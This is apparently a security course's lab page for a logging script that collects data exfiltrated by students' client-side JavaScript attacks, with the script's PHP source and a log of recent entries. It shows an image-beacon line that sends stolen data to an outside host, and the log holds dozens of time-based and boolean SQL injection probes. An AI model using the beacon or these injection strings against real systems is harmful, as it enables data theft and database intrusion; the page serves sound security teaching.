You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.5660/2023/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Sun, 20 Sep 2026 01:18:50 +0000: 1: 1 Sun, 20 Sep 2026 01:18:50 +0000: : can I ask you a question please? Sun, 20 Sep 2026 01:06:12 +0000: : (select 198766*667891 from DUAL) Sun, 20 Sep 2026 01:06:12 +0000: : (select 198766*667891) Sun, 20 Sep 2026 01:06:12 +0000: : @@ybixw Sun, 20 Sep 2026 01:06:12 +0000: : can I ask you a question please?����%2527%2522\'\" Sun, 20 Sep 2026 01:06:12 +0000: : can I ask you a question please?'" Sun, 20 Sep 2026 01:06:11 +0000: : can I ask you a question please? Sun, 20 Sep 2026 01:06:11 +0000: : can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sun, 20 Sep 2026 01:06:11 +0000: : can I ask you a question please?j1Gdc72z')) OR 662=(SELECT 662 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:06:11 +0000: : can I ask you a question please?Zh2FdKe6') OR 358=(SELECT 358 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:06:10 +0000: : can I ask you a question please?ylG1OCbT' OR 388=(SELECT 388 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:06:10 +0000: : can I ask you a question please?sOKzPno6'; waitfor delay '0:0:15' -- Sun, 20 Sep 2026 01:06:09 +0000: : can I ask you a question please?-1 waitfor delay '0:0:15' -- Sun, 20 Sep 2026 01:06:09 +0000: : (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ Sun, 20 Sep 2026 01:06:08 +0000: : can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sun, 20 Sep 2026 01:06:08 +0000: : can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sun, 20 Sep 2026 01:06:07 +0000: : if(now()=sysdate(),sleep(15),0) Sun, 20 Sep 2026 01:06:06 +0000: : can I ask you a question please?'||' Sun, 20 Sep 2026 01:06:06 +0000: : -1 OR 5*5=26 Sun, 20 Sep 2026 01:06:06 +0000: : -1 OR 5*5=25 Sun, 20 Sep 2026 01:06:06 +0000: : -1 OR 5*5=26 -- Sun, 20 Sep 2026 01:06:06 +0000: : -1 OR 5*5=25 -- Sun, 20 Sep 2026 01:06:05 +0000: : can I ask you a question please?%' AND 2*3*8=6*8 AND '3peH'!='3peH% Sun, 20 Sep 2026 01:06:05 +0000: : can I ask you a question please?" AND 2*3*8=6*8 AND "hcZ5"="hcZ5 Sun, 20 Sep 2026 01:06:05 +0000: : can I ask you a question please?' AND 2*3*8=6*8 AND 'z1ZH'='z1ZH Sun, 20 Sep 2026 01:06:04 +0000: : can I ask you a question please?FiTznfTv Sun, 20 Sep 2026 01:06:01 +0000: : can I ask you a question please? Sun, 20 Sep 2026 01:05:55 +0000: : can I ask you a question please? Sun, 20 Sep 2026 01:05:49 +0000: : can I ask you a question please? Sun, 20 Sep 2026 01:05:43 +0000: can I ask you a question please?: (select 198766*667891 from DUAL) Sun, 20 Sep 2026 01:05:43 +0000: can I ask you a question please?: (select 198766*667891) Sun, 20 Sep 2026 01:05:43 +0000: 1-1); waitfor delay '0:0:15' -- : can I ask you a question please? Sun, 20 Sep 2026 01:05:43 +0000: can I ask you a question please?: @@Rk4Qz Sun, 20 Sep 2026 01:05:42 +0000: can I ask you a question please?: ����%2527%2522\'\" Sun, 20 Sep 2026 01:05:42 +0000: can I ask you a question please?: '" Sun, 20 Sep 2026 01:05:42 +0000: can I ask you a question please?: 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sun, 20 Sep 2026 01:05:41 +0000: can I ask you a question please?: 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) Sun, 20 Sep 2026 01:05:40 +0000: can I ask you a question please?: 1NqmhxbJ1')) OR 913=(SELECT 913 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:40 +0000: can I ask you a question please?: 1uqXRgQmA') OR 468=(SELECT 468 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:39 +0000: can I ask you a question please?: 1y0TUdvp2' OR 598=(SELECT 598 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:38 +0000: can I ask you a question please?: 1-1)) OR 762=(SELECT 762 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:37 +0000: can I ask you a question please?: 1-1) OR 376=(SELECT 376 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:37 +0000: can I ask you a question please?: 1-1 OR 303=(SELECT 303 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:37 +0000: 1: can I ask you a question please? Sun, 20 Sep 2026 01:05:37 +0000: can I ask you a question please?: 1puzidjvE'; waitfor delay '0:0:15' -- Sun, 20 Sep 2026 01:05:36 +0000: can I ask you a question please?: 1-1 waitfor delay '0:0:15' -- Sun, 20 Sep 2026 01:05:36 +0000: can I ask you a question please?: 1-1); waitfor delay '0:0:15' -- Sun, 20 Sep 2026 01:05:36 +0000: can I ask you a question please?: 1-1; waitfor delay '0:0:15' -- Sun, 20 Sep 2026 01:05:35 +0000: can I ask you a question please?: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ Sun, 20 Sep 2026 01:05:35 +0000: can I ask you a question please?: 10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z Sun, 20 Sep 2026 01:05:34 +0000: can I ask you a question please?: 10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z Sun, 20 Sep 2026 01:05:34 +0000: can I ask you a question please?: 1*if(now()=sysdate(),sleep(15),0) Sun, 20 Sep 2026 01:05:34 +0000: can I ask you a question please?: -1" OR 5*5=25 or "QKbvGwUb"=" Sun, 20 Sep 2026 01:05:34 +0000: can I ask you a question please?: -1' OR 5*5=25 or 'L7sWFQVs'=' Sun, 20 Sep 2026 01:05:33 +0000: can I ask you a question please?: -1" OR 5*5=25 -- Sun, 20 Sep 2026 01:05:33 +0000: can I ask you a question please?: -1' OR 5*5=25 -- Sun, 20 Sep 2026 01:05:33 +0000: can I ask you a question please?: -1 OR 5*5=25 Sun, 20 Sep 2026 01:05:33 +0000: can I ask you a question please?: -1 OR 5*5=25 -- Sun, 20 Sep 2026 01:05:33 +0000: can I ask you a question please?: 1 Sun, 20 Sep 2026 01:05:15 +0000: : can I ask you a question please? Sun, 20 Sep 2026 01:05:14 +0000: 1: (select 198766*667891 from DUAL) Sun, 20 Sep 2026 01:05:14 +0000: 1: (select 198766*667891) Sun, 20 Sep 2026 01:05:14 +0000: 1: @@LJHuo Sun, 20 Sep 2026 01:05:14 +0000: 1: 1����%2527%2522\'\" Sun, 20 Sep 2026 01:05:14 +0000: 1: 1'" Sun, 20 Sep 2026 01:05:14 +0000: 1: 1 Sun, 20 Sep 2026 01:05:14 +0000: 1: 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sun, 20 Sep 2026 01:05:13 +0000: 1: 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) Sun, 20 Sep 2026 01:05:13 +0000: 1: 17xs5w97e')) OR 71=(SELECT 71 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:13 +0000: 1: 1cGniHA4E') OR 506=(SELECT 506 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:12 +0000: 1: 1xNhg6c5W' OR 642=(SELECT 642 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:12 +0000: 1: 1-1)) OR 376=(SELECT 376 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:11 +0000: 1: 1-1) OR 949=(SELECT 949 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:11 +0000: 1: 1-1 OR 532=(SELECT 532 FROM PG_SLEEP(15))-- Sun, 20 Sep 2026 01:05:10 +0000: 1: 1EybkDai5'; waitfor delay '0:0:15' -- Sun, 20 Sep 2026 01:05:10 +0000: 1: 1-1 waitfor delay '0:0:15' -- Sun, 20 Sep 2026 01:05:10 +0000: 1: 1-1); waitfor delay '0:0:15' -- Sun, 20 Sep 2026 01:05:09 +0000: 1: 1-1; waitfor delay '0:0:15' -- Sun, 20 Sep 2026 01:05:09 +0000: 1: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ Sun, 20 Sep 2026 01:05:08 +0000: 1: 10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z Sun, 20 Sep 2026 01:05:08 +0000: 1: 10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z Sun, 20 Sep 2026 01:05:07 +0000: 1: 1*if(now()=sysdate(),sleep(15),0) Sun, 20 Sep 2026 01:05:07 +0000: 1: -1 OR 5*5=26 Sun, 20 Sep 2026 01:05:07 +0000: 1: -1 OR 5*5=25 Sun, 20 Sep 2026 01:05:07 +0000: 1: -1 OR 5*5=26 -- Sun, 20 Sep 2026 01:05:07 +0000: 1: -1 OR 5*5=25 -- Sun, 20 Sep 2026 01:05:07 +0000: 1: 1+949-944-5 Sun, 20 Sep 2026 01:05:06 +0000: 1: 1*944*939*0 Sun, 20 Sep 2026 01:05:06 +0000: 1: 1+509-504-5 Sun, 20 Sep 2026 01:05:06 +0000: 1: 1*504*499*0 Sun, 20 Sep 2026 01:05:06 +0000: 1: 1+257-252-5 Sun, 20 Sep 2026 01:05:06 +0000: 1: 1*252*247*0 Sun, 20 Sep 2026 01:05:06 +0000: 1: 1*1 Sun, 20 Sep 2026 01:05:05 +0000: 1: 1sFqlvXR2 Sun, 20 Sep 2026 01:05:03 +0000: 1: 1 Sun, 20 Sep 2026 01:04:57 +0000: 1: 1 Sun, 20 Sep 2026 01:04:51 +0000: 1-1; waitfor delay '0:0:15' -- : 1 Sun, 20 Sep 2026 01:04:45 +0000: 1: 1
In case you are curious, here is the source code of this page.
<?php header("Access-Control-Allow-Origin: *"); do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.5660-2023-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.5660/2023/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.5660-2023-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>